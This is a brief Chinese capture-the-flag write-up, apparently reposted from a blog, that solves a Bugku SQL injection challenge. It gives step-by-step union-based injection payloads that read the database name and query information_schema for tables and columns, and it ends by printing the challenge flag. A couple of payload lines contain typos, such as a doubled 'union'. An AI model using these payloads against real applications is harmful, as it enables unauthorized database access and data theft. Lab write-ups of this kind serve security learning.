标签:select format inject order by code black mamicode flag 没反应
现将id=2‘注释掉,id=-2‘即可注释掉
输入id=-2‘ union select union 1,2,3,4#
再输入d=-2‘ union select union 1,2,3,database()#查看数据库
在获取数据表输入
id=-2‘ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=‘skctf_flag‘#
获得两个数据表
id=-2‘ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=‘fl4g‘#
得到一个列
id=-2‘ union select 1,2,3,group_concat(skctf_flag) from fl4g#
成功获得flag BUGKU{Sql_INJECT0N_4813drd8hz4}
标签:select format inject order by code black mamicode flag 没反应
原文地址:https://www.cnblogs.com/cxl862002755/p/13205558.html